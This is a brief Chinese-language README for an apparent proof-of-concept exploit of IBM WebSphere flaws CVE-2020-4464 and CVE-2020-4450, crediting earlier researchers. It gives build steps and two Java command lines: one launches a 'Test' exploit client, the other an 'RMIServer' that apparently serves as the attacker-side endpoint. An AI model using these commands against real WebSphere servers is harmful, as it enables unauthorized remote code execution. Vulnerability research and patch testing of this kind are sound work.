
CVE-2020-4464 / CVE-2020-4450
这是基于 ZDI 的优秀博客文章(最初由 @_tint0 报告):
……以及一些优秀的中国黑客的工作(我无法确定代码的真正来源,如果你认为自己应得荣誉,请随时提出 Issue):
我的添加(其实不多):
FoxGlove 的代码 作为子模块引入,你可以使用 WebSphere 请求文件来触发 CVE-2020-4464。
你应该将 WebSphere 中的 plugins 和 runtimes 目录复制到 lib 目录,然后运行 ant 进行编译!
运行(Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer